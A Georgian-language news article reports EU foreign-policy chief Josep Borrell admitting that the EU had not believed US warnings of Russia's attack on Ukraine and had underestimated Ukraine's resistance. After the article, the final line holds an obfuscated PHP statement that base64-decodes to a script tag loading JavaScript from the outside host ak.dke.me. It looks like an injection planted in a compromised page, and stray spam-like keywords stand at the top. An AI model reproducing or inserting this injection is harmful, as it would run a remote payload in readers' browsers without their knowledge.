celsiusi
ავერსი საქკაბელი
უნდა ვაღიარო, როდესაც ამერიკელებმა გვითხრეს, რომ რუსეთი თავს დაესხმება უკრაინას, ჩვენ არ გვინდოდა ამის დაჯერება, – ამის შესახებ საგარეო და უსაფრთხოების პოლიტიკის სფეროში ევროკავშირის უმაღლესმა წარმომადგენელმა ჯოზეფ ბორელმა ბრიუსელში გამართულ ამბასადორიალზე განაცხადა.
 
მისივე თქმით, ვერ წარმოიდგენდნენ, როგორ ეფექტურ წინააღმდეგობას გაუწევდა უკრაინა რუსეთს.
 
„ომი უკრაინაში გრძელდება. ჩვენ ვერ წარმოვიდგენდით, როგორ ეფექტურ წინააღმდეგობას გაუწევდა უკრაინა და არ გვჯეროდა, რომ ომი იქნებოდა. უნდა ვაღიარო, რომ როდესაც ამერიკელებმა გვითხრეს, ისინი თავს დაესხმებიან, ჩვენ არ გვინდოდა ამის დაჯერება“, – განაცხადა ბორელმა.
 
მისივე თქმით, ომის დაწყებამდე მას აშშ-ის სახელმწიფო მდივანმა დაურეკა და უთხრა, რომ რუსეთი შეტევას დაიწყებდა კვირის ბოლოს.
 
„და ორი დღის შემდეგ მათ დაიწყეს კიევის დაბომბვა. ჩვენ არ გვჯეროდა, რომ ეს მოხდებოდა და არ გვეგონა, რომ უკრაინა მზად იყო, წინააღმდეგობა გაეწია ისე ძლიერად და წარმატებით, როგორც ამას აკეთებენ, რა თქმა უნდა, ჩვენი სამხედრო მხარდაჭერის წყალობით. ამის გარეშე შეუძლებელი იქნებოდა, მაგრამ უკრაინელებმა, თავისი წვლილი შეიტანეს“, – აღნიშნა ბორელმა.
 
ამასთან, ევროკავშირის უმაღლესი წარმომადგენლის თქმით, ევროკავშირი არ თვლიდა, რომ პუტინს შეეძლო მასობრივი მობილიზაციისა და ბირთვული საფრთხეების წინ წამოწევა.
 
„ვფიქრობ, თქვენ, ყველამ წაიკითხეთ პუტინის ბოლო გამოსვლა, როდესაც მან ანექსია გამოაცხადა. ეს გამოსვლა ყველა ევროპელმა მოქალაქემ უნდა წაიკითხოს, განსაკუთრებით კი თქვენ. თქვენ უნდა აუხსნათ მსოფლიოს, რას ნიშნავს მისი დამოკიდებულება დასავლეთის მიმართ და რა არის ომის ნამდვილი მიზეზები“, – განაცხადა ბორელმა.
545
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");